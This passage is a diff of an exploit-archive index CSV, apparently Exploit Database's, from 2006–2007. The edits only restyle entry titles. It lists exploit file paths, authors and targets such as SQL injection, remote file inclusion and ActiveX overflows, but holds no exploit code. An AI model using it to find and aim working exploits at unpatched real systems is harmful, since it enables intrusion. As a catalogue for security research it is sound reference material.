SQL Injection",2006-12-28,"the master",php,webapps,0 @@ -2718,7 +2718,7 @@ id,file,description,date,author,platform,type,port 3038,platforms/windows/dos/3038.php,"Durian Web Application Server 3.02 - Denial of Service",2006-12-29,rgod,windows,dos,0 3039,platforms/php/webapps/3039.txt,"EasyNews PRO News Publishing 4.0 - Password Disclosure",2006-12-29,bd0rk,php,webapps,0 3041,platforms/windows/dos/3041.html,"Macromedia Flash 8 (Flash8b.ocx) Internet Explorer 7 - Denial of Service",2006-12-29,shinnai,windows,dos,0 -3042,platforms/windows/dos/3042.html,"Macromedia Shockwave 10 (SwDir.dll) Internet Explorer 7 - Denial of Service",2006-12-29,shinnai,windows,dos,0 +3042,platforms/windows/dos/3042.html,"Macromedia Shockwave 10 'SwDir.dll' Internet Explorer 7 - Denial of Service",2006-12-29,shinnai,windows,dos,0 3043,platforms/php/webapps/3043.txt,"x-news 1.1 - (users.txt) Remote Password Disclosure",2006-12-30,bd0rk,php,webapps,0 3044,platforms/php/webapps/3044.txt,"Voodoo chat 1.0RC1b - (users.dat) Password Disclosure",2006-12-30,bd0rk,php,webapps,0 3045,platforms/php/webapps/3045.php,"Cacti 0.8.6i - 'copy_cacti_user.php' SQL Injection Create Admin Exploit",2006-12-30,rgod,php,webapps,0 @@ -2728,7 +2728,7 @@ id,file,description,date,author,platform,type,port 3049,platforms/php/webapps/3049.php,"IMGallery 2.5 - Create Uploader Script Exploit",2006-12-30,Kacper,php,webapps,0 3050,platforms/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge - (boarddir) Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 3051,platforms/php/webapps/3051.txt,"WordPress Plugin Enigma 2 Bridge - (boarddir) Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 -3052,platforms/windows/dos/3052.c,"Microsoft Windows - NtRaiseHardError Csrss.exe-winsrv.dll Double-Free",2006-12-31,"Ruben Santamarta ",windows,dos,0 +3052,platforms/windows/dos/3052.c,"Microsoft Windows - NtRaiseHardError 'Csrss.exe/winsrv.dll' Double-Free",2006-12-31,"Ruben Santamarta ",windows,dos,0 3053,platforms/php/webapps/3053.txt,"Vz (Adp) Forum 2.0.3 - Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,php,webapps,0 3054,platforms/php/webapps/3054.txt,"P-News 1.16 / 1.17 - (user.dat) Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,php,webapps,0 3055,platforms/windows/remote/3055.html,"WinZip 10.0 - FileView ActiveX Controls Remote Overflow",2006-12-31,XiaoHui,windows,remote,0 @@ -2830,9 +2830,9 @@ id,file,description,date,author,platform,type,port 3152,platforms/php/webapps/3152.txt,"ComVironment 4.0 - (grab_globals.lib.php) Remote File Inclusion",2007-01-18,GoLd_M,php,webapps,0 3153,platforms/php/webapps/3153.php,"phpBP RC3 - (2.204) (SQL Injection / cmd) Remote Code Execution",2007-01-18,Kacper,php,webapps,0 3154,platforms/linux/local/3154.c,"GNU/Linux mbse-bbs 0.70.0 - Local Buffer Overflow",2007-01-18,prdelka,linux,local,0 -3155,platforms/windows/dos/3155.html,"BrowseDialog Class (ccrpbds6.dll) Internet Explorer 7 - Denial of Service",2007-01-18,shinnai,windows,dos,0 +3155,platforms/windows/dos/3155.html,"BrowseDialog Class 'ccrpbds6.dll' Internet Explorer 7 - Denial of Service",2007-01-18,shinnai,windows,dos,0 3156,platforms/osx/local/3156.rb,"Rumpus 5.1 - Privilege Escalation / Remote FTP LIST (PoC)",2007-01-19,MoAB,osx,local,0 -3157,platforms/windows/dos/3157.html,"DivX Player 6.4.1 - (DivXBrowserPlugin npdivx32.dll) IE Denial of Service",2007-01-19,shinnai,windows,dos,0 +3157,platforms/windows/dos/3157.html,"DivX Player 6.4.1 - DivXBrowserPlugin 'npdivx32.dll' IE Denial of Service",2007-01-19,shinnai,windows,dos,0 3158,platforms/windows/remote/3158.c,"Intel Centrino ipw2200BG - Wireless Driver Remote Overflow (PoC)",2007-01-19,oveRet,windows,remote,0 3159,platforms/windows/local/3159.cpp,"Microsoft Help Workshop 4.03.0002 - '.HPJ' Buffer Overflow",2007-01-19,porkythepig,windows,local,0 3160,platforms/osx/dos/3160.html,"Transmit.app 3.5.5 - 'ftps://' URL Handler Heap Buffer Overflow (PoC)",2007-01-20,MoAB,osx,dos,0 @@ -2879,9 +2879,9 @@ id,file,description,date,author,platform,type,port 3203,platforms/php/webapps/3203.txt,"FdScript 1.3.2 - 'download.php' Remote File Disclosure",2007-01-26,ajann,php,webapps,0 3204,platforms/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider - Buffer Overflow (PoC)",2007-01-26,"Andres Tarasco",windows,dos,0 3205,platforms/php/webapps/3205.txt,"nsGalPHP - (includes/config.inc.php racineTBS) Remote File Inclusion",2007-01-27,S.W.A.T.,php,webapps,0 -3206,platforms/php/webapps/3206.txt,"ACGVclick 0.2.0 - (path) Remote File Inclusion",2007-01-27,ajann,php,webapps,0 +3206,platforms/php/webapps/3206.txt,"ACGVclick 0.2.0 - 'path' Remote File Inclusion",2007-01-27,ajann,php,webapps,0 3207,platforms/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Inclusion",2007-01-27,MackRulZ,php,webapps,0 -3208,platforms/php/webapps/3208.txt,"ACGVannu 1.3 - (index2.php) Remote User Pass Change",2007-01-27,ajann,php,webapps,0 +3208,platforms/php/webapps/3208.txt,"ACGVannu 1.3 - 'index2.php' Remote User Pass Change",2007-01-27,ajann,php,webapps,0 3209,platforms/php/webapps/3209.txt,"Xt-Stats 2.4.0.b3 (server_base_dir) - Remote File Inclusion",2007-01-27,"ThE dE@Th",php,webapps,0 3210,platforms/asp/webapps/3210.txt,"chernobiLe Portal 1.0 - 'default.asp' SQL Injection",2007-01-27,ajann,asp,webapps,0 3211,platforms/windows/remote/3211.py,"CA BrightStor ARCserve - (msgeng.exe) Remote Heap Overflow (1)",2007-01-27,"Winny Thomas",windows,remote,6503 @@ -2921,7 +2921,7 @@ id,file,description,date,author,platform,type,port 3245,platforms/php/webapps/3245.txt,"SIPS 0.3.1 - (box.inc.php) Remote File Inclusion",2007-02-01,ajann,php,webapps,0 3246,platforms/php/webapps/3246.txt,"phpEventMan 1.0.2 - (level) Remote File Inclusion",2007-02-01,"Mehmet Ince",php,webapps,0 3247,platforms/php/webapps/3247.txt,"Epistemon 1.0 - (common.php inc_path) Remote File Inclusion",2007-02-01,GoLd_M,php,webapps,0 -3248,platforms/windows/dos/3248.rb,"CA BrightStor ARCserve 11.5.2.0 - (catirpc.dll) RPC Server Denial of Service",2007-02-01,Shirkdog,windows,dos,0 +3248,platforms/windows/dos/3248.rb,"CA BrightStor ARCserve 11.5.2.0 - 'catirpc.dll' RPC Server Denial of Service",2007-02-01,Shirkdog,windows,dos,0 3249,platforms/php/webapps/3249.txt,"WebBuilder 2.0 - (StageLoader.php) Remote File Inclusion",2007-02-01,GoLd_M,php,webapps,0 3250,platforms/php/webapps/3250.txt,"Portail Web PHP 2.5.1 - (includes.php) Remote File Inclusion",2007-02-01,"laurent gaffié ",php,webapps,0 3251,platforms/php/webapps/3251.txt,"CoD2: DreamStats 4.2 - 'index.php' Remote File Inclusion",2007-02-02,"ThE dE@Th",php,webapps,0 @@ -3063,7 +3063,7 @@ id,file,description,date,author,platform,type,port 3389,platforms/linux/remote/3389.c,"madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow",2007-03-01,"Massimiliano Oldani",linux,remote,0 3390,platforms/asp/webapps/3390.txt,"Angel Lms 7.1 - (default.asp id) SQL Injection",2007-03-01,"Craig Heffner",asp,webapps,0 3391,platforms/windows/remote/3391.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-01,"Trirat Puttaraksa",windows,remote,0 -3392,platforms/windows/dos/3392.html,"DivX Web Player 1.3.0 - (npdivx32.dll) Remote Denial of Service",2007-03-01,shinnai,windows,dos,0 +3392,platforms/windows/dos/3392.html,"DivX Web Player 1.3.0 - 'npdivx32.dll' Remote Denial of Service",2007-03-01,shinnai,windows,dos,0 3393,platforms/php/webapps/3393.php,"phpMyFAQ 1.6.7 - SQL Injection / Command Execution",2007-03-01,elgCrew,php,webapps,0 3394,platforms/multiple/dos/3394.php,"PHP 4 - Userland ZVAL Reference Counter Overflow (PoC)",2007-03-01,"Stefan Esser",multiple,dos,0 3395,platforms/windows/remote/3395.c,"WebMod 0.48 - (Content-Length) Remote Buffer Overflow (PoC)",2007-03-01,cybermind,windows,remote,0 @@ -3092,7 +3092,7 @@ id,file,description,date,author,platform,type,port 3418,platforms/windows/dos/3418.pl,"Mercury/32 Mail Server 4.01b - (check) Buffer Overflow (PoC)",2007-03-06,mu-b,windows,dos,0 3419,platforms/windows/dos/3419.txt,"Microsoft Windows - '.doc' Malformed Pointers Denial of Service",2007-03-06,Marsu,windows,dos,0 3420,platforms/windows/remote/3420.html,"WinZip 10.0.7245 - FileView ActiveX Buffer Overflow (2)",2007-03-06,prdelka,windows,remote,0 -3421,platforms/windows/dos/3421.html,"Macromedia 10.1.4.20 - SwDir.dll Internet Explorer Stack Overflow Denial of Service",2007-03-07,shinnai,windows,dos,0 +3421,platforms/windows/dos/3421.html,"Macromedia 10.1.4.20 - 'SwDir.dll' Internet Explorer Stack Overflow Denial of Service",2007-03-07,shinnai,windows,dos,0 3422,platforms/windows/remote/3422.pl,"Winamp 5.12 - '.pls' Remote Buffer Overflow (Perl) (2)",2007-03-07,"Umesh Wanve",windows,remote,0 3423,platforms/php/webapps/3423.txt,"PHP-Nuke Module PostGuestbook 0.6.1 - (tpl_pgb_moddir) Remote File Inclusion",2007-03-07,GoLd_M,php,webapps,0 3424,platforms/multiple/local/3424.php,"PHP 5.2.1 - substr_compare() Information Leak Exploit",2007-03-07,"Stefan Esser",multiple,local,0 @@ -3101,7 +3101,7 @@ id,file,description,date,author,platform,type,port 3427,platforms/linux/local/3427.php,"PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure",2007-03-07,"Stefan Esser",linux,local,0 3428,platforms/php/webapps/3428.txt,"Flat Chat 2.0 - (include online.txt) Remote Code Execution",2007-03-07,Dj7xpl,php,webapps,0 3429,platforms/windows/local/3429.php,"PHP COM extensions - (inconsistent Win32) Safe_mode Bypass Exploit",2007-03-07,anonymous,windows,local,0 -3430,platforms/windows/dos/3430.html,"Adobe Reader plugin AcroPDF.dll 8.0.0.0 - Resource Consumption",2007-03-08,shinnai,windows,dos,0 +3430,platforms/windows/dos/3430.html,"Adobe Reader Plugin 'AcroPDF.dll' 8.0.0.0 - Resource Consumption",2007-03-08,shinnai,windows,dos,0 3431,platforms/windows/local/3431.php,"PHP 4.4.6 - crack_opendict() Local Buffer Overflow (PoC)",2007-03-08,rgod,windows,local,0 3432,platforms/windows/dos/3432.pl,"TFTPDWIN Server 0.4.2 - (UDP) Denial of Service",2007-03-08,"Umesh Wanve",windows,dos,0 3433,platforms/windows/dos/3433.html,"Rediff Toolbar - ActiveX Control Remote Denial of Service",2007-03-08,"Umesh Wanve",windows,dos,0 @@ -3450,7 +3450,7 @@ id,file,description,date,author,platform,type,port 3787,platforms/linux/remote/3787.c,"GNU Mailutils imap4d 0.6 - Remote Format String (exec-shield)",2007-04-24,Xpl017Elz,linux,remote,143 3788,platforms/windows/dos/3788.html,"Second Sight Software - ActiveGS.ocx ActiveX Buffer Overflow (PoC)",2007-04-24,"Umesh Wanve",windows,dos,0 3789,platforms/windows/dos/3789.html,"Second Sight Software - ActiveMod.ocx ActiveX Buffer Overflow (PoC)",2007-04-24,"Umesh Wanve",windows,dos,0 -3790,platforms/windows/dos/3790.html,"NetSprint Toolbar - ActiveX toolbar.dll Denial of Service (PoC)",2007-04-24,"Umesh Wanve",windows,dos,0 +3790,platforms/windows/dos/3790.html,"NetSprint Toolbar - ActiveX 'toolbar.dll' Denial of Service (PoC)",2007-04-24,"Umesh Wanve",windows,dos,0 3791,platforms/hardware/dos/3791.pl,"Linksys SPA941 - \377 Character Remote Denial of Service",2007-04-24,MADYNES,hardware,dos,0 3792,platforms/hardware/dos/3792.pl,"Linksys SPA941 - (remote reboot) Remote Denial of Service",2007-04-24,MADYNES,hardware,dos,0 3793,platforms/windows/local/3793.c,"Adobe Photoshop CS2 - / CS3 Unspecified '.bmp' File Buffer Overflow",2007-04-24,Marsu,windows,local,0 @@ -3504,7 +3504,7 @@ id,file,description,date,author,platform,type,port 3841,platforms/php/webapps/3841.txt,"Pre News Manager 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3842,platforms/php/webapps/3842.txt,"Pre Shopping Mall 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3843,platforms/php/webapps/3843.txt,"Censura 1.15.04 - (censura.php vendorid) SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 -3844,platforms/windows/remote/3844.html,"ActSoft DVD-Tools - (dvdtools.ocx 3.8.5.0) Stack Overflow",2007-05-04,shinnai,windows,remote,0 +3844,platforms/windows/remote/3844.html,"ActSoft DVD-Tools - 'dvdtools.ocx 3.8.5.0' Stack Overflow",2007-05-04,shinnai,windows,remote,0 3845,platforms/windows/dos/3845.html,"Office Viewer OCX 3.2.0.5 - Multiple Methods Denial of Service",2007-05-04,shinnai,windows,dos,0 3846,platforms/php/webapps/3846.txt,"E-GADS! 2.2.6 - (common.php locale) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 3847,platforms/php/webapps/3847.txt,"Versado CMS 1.07 - (ajax_listado.php urlModulo) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 @@ -3533,7 +3533,7 @@ id,file,description,date,author,platform,type,port 3870,platforms/php/webapps/3870.txt,"LaVague 0.3 - (printbar.php views_path) Remote File Inclusion",2007-05-08,kezzap66345,php,webapps,0 3871,platforms/multiple/dos/3871.html,"Opera 9.10 - alert() Remote Denial of Service",2007-05-08,Dj7xpl,multiple,dos,0 3872,platforms/windows/remote/3872.html,"Taltech Tal Bar Code - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",windows,remote,0 -3873,platforms/windows/dos/3873.html,"SmartCode VNC Manager 3.6 - (scvncctrl.dll) Denial of Service",2007-05-08,shinnai,windows,dos,0 +3873,platforms/windows/dos/3873.html,"SmartCode VNC Manager 3.6 - 'scvncctrl.dll' Denial of Service",2007-05-08,shinnai,windows,dos,0 3874,platforms/php/webapps/3874.txt,"CGX 20050314 - (pathCGX) Remote File Inclusion",2007-05-08,GoLd_M,php,webapps,0 3875,platforms/php/webapps/3875.txt,"PHPLojaFacil 0.1.5 - (path_local) Remote File Inclusion",2007-05-08,GoLd_M,php,webapps,0 3876,platforms/php/webapps/3876.txt,"GNUEDU 1.3b2 - Multiple Remote File Inclusion",2007-05-08,GoLd_M,php,webapps,0 @@ -3542,22 +3542,22 @@ id,file,description,date,author,platform,type,port 3879,platforms/php/webapps/3879.htm,"phpMyPortal 3.0.0 RC3 - GLOBALS[CHEMINMODULES] Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0 3880,platforms/windows/remote/3880.html,"Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate Overwrite (SEH)",2007-05-09,"Parveen Vashishtha",windows,remote,0 3881,platforms/windows/remote/3881.html,"Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate EIP Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 -3882,platforms/windows/remote/3882.html,"Barcodewiz ActiveX Control 2.52 - (Barcodewiz.dll) Overwrite (SEH)",2007-05-09,"Parveen Vashishtha",windows,remote,0 -3883,platforms/windows/dos/3883.html,"Barcodewiz ActiveX Control 2.0 - (Barcodewiz.dll) Remote Buffer Overflow (PoC)",2007-05-09,shinnai,windows,dos,0 +3882,platforms/windows/remote/3882.html,"Barcodewiz ActiveX Control 2.52 - 'Barcodewiz.dll' Overwrite (SEH)",2007-05-09,"Parveen Vashishtha",windows,remote,0 +3883,platforms/windows/dos/3883.html,"Barcodewiz ActiveX Control 2.0 - 'Barcodewiz.dll' Remote Buffer Overflow (PoC)",2007-05-09,shinnai,windows,dos,0 3884,platforms/php/webapps/3884.txt,"aForum 1.32 - (CommonAbsDir) Remote File Inclusion",2007-05-09,"ThE TiGeR",php,webapps,0 3885,platforms/php/webapps/3885.txt,"telltarget 1.3.3 - (tt_docroot) Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0 3886,platforms/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - (print.php news_id) SQL Injection",2007-05-09,Silentz,php,webapps,0 3887,platforms/php/webapps/3887.pl,"TutorialCMS 1.00 - (search.php search) SQL Injection",2007-05-09,Silentz,php,webapps,0 3888,platforms/windows/local/3888.c,"Gimp 2.2.14 (Win x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0 3890,platforms/windows/dos/3890.html,"McAfee VirusScan 10.0.21 - ActiveX control Stack Overflow (PoC)",2007-05-09,callAX,windows,dos,0 -3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 - RControl.dll Denial of Service",2007-05-10,shinnai,windows,dos,0 +3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 - 'RControl.dll' Denial of Service",2007-05-10,shinnai,windows,dos,0 3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0 3893,platforms/windows/remote/3893.c,"McAfee Security Center IsOldAppInstalled - ActiveX Buffer Overflow",2007-05-10,Jambalaya,windows,remote,0 3894,platforms/php/webapps/3894.txt,"Original 0.11 - config.inc.php x[1] Remote File Inclusion",2007-05-10,GoLd_M,php,webapps,0 3895,platforms/php/webapps/3895.txt,"Thyme Calendar 1.3 - SQL Injection",2007-05-10,warlord,php,webapps,0 3896,platforms/php/webapps/3896.pl,"TaskDriver 1.2 - Login Bypass / SQL Injection",2007-05-10,Silentz,php,webapps,0 3897,platforms/windows/local/3897.c,"eTrust AntiVirus Agent r8 - Local Privilege Elevation Exploit",2007-05-11,binagres,windows,local,0 -3898,platforms/windows/dos/3898.html,"Hewlett Packard 1.0.0.309 - hpqvwocx.dll ActiveX Magview Overflow (PoC)",2007-05-11,callAX,windows,dos,0 +3898,platforms/windows/dos/3898.html,"Hewlett Packard 1.0.0.309 - 'hpqvwocx.dll' ActiveX Magview Overflow (PoC)",2007-05-11,callAX,windows,dos,0 3899,platforms/windows/remote/3899.html,"Morovia Barcode ActiveX Professional 3.3.1304 - Arbitrary File Overwrite",2007-05-11,shinnai,windows,remote,0 3900,platforms/php/webapps/3900.php,"Snaps! Gallery 1.4.4 - Remote User Pass Change Exploit",2007-05-11,Dj7xpl,php,webapps,0 3901,platforms/php/webapps/3901.txt,"maGAZIn 2.0 - (PHPThumb.php src) Remote File Disclosure",2007-05-11,Dj7xpl,php,webapps,0 @@ -3625,7 +3625,7 @@ id,file,description,date,author,platform,type,port 3964,platforms/php/webapps/3964.txt,"Ol BookMarks Manager 0.7.4 - SQL Injection",2007-05-21,"Mehmet Ince",php,webapps,0 3965,platforms/windows/dos/3965.pl,"Microsoft IIS 6.0 - /AUX / '.aspx' Remote Denial of Service",2007-05-21,kingcope,windows,dos,0 3966,platforms/windows/remote/3966.php,"Pegasus ImagN - ActiveX Control Remote Buffer Overflow",2007-05-21,rgod,windows,remote,0 -3967,platforms/windows/remote/3967.html,"Virtual CD 9.0.0.2 - (vc9api.DLL) Remote Shell Commands Execution Exploit",2007-05-21,rgod,windows,remote,0 +3967,platforms/windows/remote/3967.html,"Virtual CD 9.0.0.2 - 'vc9api.DLL' Remote Shell Commands Execution Exploit",2007-05-21,rgod,windows,remote,0 3968,platforms/windows/remote/3968.html,"KSign KSignSWAT 2.0.3.3 - ActiveX Control Remote Buffer Overflow",2007-05-22,"KIM Kee-hong",windows,remote,0 3969,platforms/windows/dos/3969.html,"LeadTools ISIS Control - (ltisi14E.ocx v.14.5.0.44) Remote Denial of Service",2007-05-22,shinnai,windows,dos,0 3970,platforms/php/webapps/3970.txt,"BtiTracker 1.4.1 - (become admin) SQL Injection",2007-05-22,m@ge|ozz,php,webapps,0 @@ -3669,18 +3669,18 @@ id,file,description,date,author,platform,type,port 4008,platforms/windows/remote/4008.html,"Zenturi ProgramChecker - ActiveX File Download/Overwrite",2007-05-30,shinnai,windows,remote,0 4009,platforms/windows/dos/4009.html,"EDraw Office Viewer Component - Denial of Service",2007-05-30,shinnai,windows,dos,0 4010,platforms/windows/remote/4010.html,"EDraw Office Viewer Component - Unsafe Method Exploit",2007-05-30,shinnai,windows,remote,0 -4011,platforms/windows/dos/4011.html,"LeadTools Raster ISIS Object (LTRIS14e.DLL 14.5.0.44) - Remote Buffer Overflow",2007-05-30,shinnai,windows,dos,0 +4011,platforms/windows/dos/4011.html,"LeadTools Raster ISIS Object 'LTRIS14e.DLL 14.5.0.44' - Remote Buffer Overflow",2007-05-30,shinnai,windows,dos,0 4012,platforms/windows/dos/4012.html,"LeadTools Raster OCR Document Object Library - Memory Corruption",2007-05-30,shinnai,windows,dos,0 4013,platforms/osx/local/4013.txt,"Apple Mac OSX < 2007-005 - (vpnd) Privilege Escalation",2007-05-30,"Kevin Finisterre",osx,local,0 4014,platforms/windows/remote/4014.py,"Eudora 7.1.0.9 - (IMAP FLAGS) Remote Overwrite (SEH)",2007-05-30,h07,windows,remote,0 -4015,platforms/windows/remote/4015.html,"Vivotek Motion Jpeg Control - (MjpegDecoder.dll 2.0.0.13) Remote Exploit",2007-05-31,rgod,windows,remote,0 +4015,platforms/windows/remote/4015.html,"Vivotek Motion Jpeg Control - 'MjpegDecoder.dll 2.0.0.13' Remote Exploit",2007-05-31,rgod,windows,remote,0 4016,platforms/windows/remote/4016.sh,"Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass",2007-05-31,Sha0,windows,remote,0 4017,platforms/windows/dos/4017.cpp,"Acoustica MP3 CD Burner 4.32 - Local Buffer Overflow (PoC)",2007-05-31,n00b,windows,dos,0 4019,platforms/php/webapps/4019.php,"Particle Gallery 1.0.1 - SQL Injection",2007-06-01,Silentz,php,webapps,0 4020,platforms/php/webapps/4020.php,"RevokeBB 1.0 RC4 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0 4021,platforms/windows/remote/4021.html,"Zenturi ProgramChecker ActiveX - 'sasatl.dll' Remote Buffer Overflow",2007-06-01,shinnai,windows,remote,0 4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion",2007-06-01,GoLd_M,php,webapps,0 -4023,platforms/windows/remote/4023.html,"Microsoft Internet Explorer 6 / Provideo Camimage - (ISSCamControl.dll 1.0.1.5) Remote Buffer Overflow",2007-06-02,rgod,windows,remote,0 +4023,platforms/windows/remote/4023.html,"Microsoft Internet Explorer 6 / Provideo Camimage - 'ISSCamControl.dll 1.0.1.5' Remote Buffer Overflow",2007-06-02,rgod,windows,remote,0 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional - '.PLF' File Buffer Overflow",2007-06-02,n00b,windows,local,0 4025,platforms/php/webapps/4025.php,"Quick.Cart 2.2 - Remote File Inclusion / Local File Inclusion Remote Code Execution",2007-06-02,Kacper,php,webapps,0 4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - (index.php c) SQL Injection",2007-06-03,Kacper,php,webapps,0 @@ -3704,12 +3704,12 @@ id,file,description,date,author,platform,type,port 4044,platforms/windows/dos/4044.txt,"Microsoft Windows GDI+ - ICO File Remote Denial of Service",2007-06-07,Kad,windows,dos,0 4045,platforms/windows/remote/4045.py,"Microsoft Windows - Animated Cursor Stack Overflow",2007-06-07,"RISE Security",windows,remote,0 4046,platforms/windows/dos/4046.pl,"MiniWeb HTTP Server 0.8.x - Remote Denial of Service",2007-06-07,gbr,windows,dos,0 -4047,platforms/windows/dos/4047.c,"SafeNet High Assurance Remote 1.4.0 - (IPSecDrv.sys) Remote Denial of Service",2007-06-08,mu-b,windows,dos,0 +4047,platforms/windows/dos/4047.c,"SafeNet High Assurance Remote 1.4.0 - 'IPSecDrv.sys' Remote Denial of Service",2007-06-08,mu-b,windows,dos,0 4049,platforms/windows/remote/4049.html,"Zenturi ProgramChecker - ActiveX Multiple Insecure Methods",2007-06-08,shinnai,windows,remote,0 4050,platforms/windows/remote/4050.html,"Zenturi ProgramChecker - ActiveX NavigateUrl() Insecure Method Exploit",2007-06-08,shinnai,windows,remote,0 4051,platforms/windows/local/4051.rb,"MoviePlay 4.76 - '.lst' Local Buffer Overflow",2007-06-08,n00b,windows,local,0 -4052,platforms/windows/remote/4052.c,"Yahoo! Messenger Webcam 8.1 - (Ywcvwr.dll) Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 -4053,platforms/windows/remote/4053.c,"Yahoo! Messenger Webcam 8.1 - (Ywcupl.dll) Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 +4052,platforms/windows/remote/4052.c,"Yahoo! Messenger Webcam 8.1 - 'Ywcvwr.dll' Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 +4053,platforms/windows/remote/4053.c,"Yahoo! Messenger Webcam 8.1 - 'Ywcupl.dll' Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 4054,platforms/php/webapps/4054.php,"e-Vision CMS 2.02 - SQL Injection / Remote Code Execution",2007-06-08,Silentz,php,webapps,0 4055,platforms/php/webapps/4055.htm,"PHP Real Estate Classifieds - Remote File Inclusion",2007-06-09,"not sec group",php,webapps,0 4056,platforms/windows/dos/4056.html,"Internet Download Accelerator 5.2 - Remote Buffer Overflow (PoC)",2007-06-09,DeltahackingTEAM,windows,dos,0 @@ -3747,23 +3747,23 @@ id,file,description,date,author,platform,type,port 4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha - Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0 4092,platforms/php/webapps/4092.txt,"NetClassifieds - (SQL Injection / Cross-Site Scripting / Full Path) Multiple Vulnerabilities",2007-06-22,"laurent gaffié ",php,webapps,0 4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow",2007-06-22,eliteboy,multiple,remote,80 -4094,platforms/windows/remote/4094.html,"BarCode ActiveX Control BarCodeAx.dll 4.9 - Remote Overflow",2007-06-22,callAX,windows,remote,0 +4094,platforms/windows/remote/4094.html,"BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Overflow",2007-06-22,callAX,windows,remote,0 4095,platforms/php/webapps/4095.txt,"Pharmacy System 2.0 - (index.php ID) SQL Injection",2007-06-24,t0pP8uZz,php,webapps,0 4096,platforms/php/webapps/4096.php,"Pluxml 0.3.1 - Remote Code Execution",2007-06-24,DarkFig,php,webapps,0 4097,platforms/php/webapps/4097.txt,"dagger Web engine 23jan2007 - Remote File Inclusion",2007-06-24,Katatafish,php,webapps,0 4098,platforms/php/webapps/4098.php,"Simple Invoices 2007 05 25 - 'index.php submit' SQL Injection",2007-06-24,Kacper,php,webapps,0 4099,platforms/php/webapps/4099.txt,"e107 <= 0.7.8 - (photograph) Arbitrary File Upload",2007-06-24,g00ns,php,webapps,0 4100,platforms/php/webapps/4100.txt,"phpTrafficA 1.4.2 - (pageid) SQL Injection",2007-06-24,"laurent gaffié ",php,webapps,0 -4101,platforms/windows/remote/4101.html,"NCTAudioEditor2 ActiveX DLL (NCTWMAFile2.dll 2.6.2.157) - Exploit",2007-06-25,shinnai,windows,remote,0 +4101,platforms/windows/remote/4101.html,"NCTAudioEditor2 ActiveX DLL 'NCTWMAFile2.dll 2.6.2.157' - Exploit",2007-06-25,shinnai,windows,remote,0 4102,platforms/php/webapps/4102.txt,"b1gbb 2.24.0 - (footer.inc.php tfooter) Remote File Inclusion",2007-06-25,Rf7awy,php,webapps,0 4103,platforms/php/webapps/4103.txt,"bugmall shopping cart 2.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-06-25,t0pP8uZz,php,webapps,0 -4104,platforms/php/webapps/4104.txt,"6ALBlog - (newsid) SQL Injection",2007-06-25,Crackers_Child,php,webapps,0 +4104,platforms/php/webapps/4104.txt,"6ALBlog - 'newsid' SQL Injection",2007-06-25,Crackers_Child,php,webapps,0 4105,platforms/php/webapps/4105.txt,"SiteDepth CMS 3.44 - (ShowImage.php name) File Disclosure",2007-06-25,"H4 / XPK",php,webapps,0 4106,platforms/php/webapps/4106.php,"DreamLog 0.5 - (upload.php) Arbitrary File Upload",2007-06-25,Dj7xpl,php,webapps,0 4107,platforms/php/webapps/4107.txt,"Pagetool 1.07 - (news_id) SQL Injection",2007-06-25,Katatafish,php,webapps,0 4108,platforms/php/webapps/4108.txt,"eDocStore - 'doc.php doc_id' SQL Injection",2007-06-25,t0pP8uZz,php,webapps,0 4109,platforms/windows/remote/4109.html,"NCTAudioStudio2 - ActiveX DLL 2.6.1.148 CreateFile() Insecure Method",2007-06-26,shinnai,windows,remote,0 -4110,platforms/windows/remote/4110.html,"Avaxswf.dll 1.0.0.1 from Avax Vector - ActiveX Arbitrary Data Write",2007-06-26,callAX,windows,remote,0 +4110,platforms/windows/remote/4110.html,"Avax Vector 'Avaxswf.dll' 1.0.0.1 - ActiveX Arbitrary Data Write",2007-06-26,callAX,windows,remote,0 4111,platforms/php/webapps/4111.txt,"PHPSiteBackup 0.1 - (pcltar.lib.php) Remote File Inclusion",2007-06-26,GoLd_M,php,webapps,0 4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1 <= 2.2 - (index.php3) Remote File Inclusion",2007-06-26,g00ns,php,webapps,0 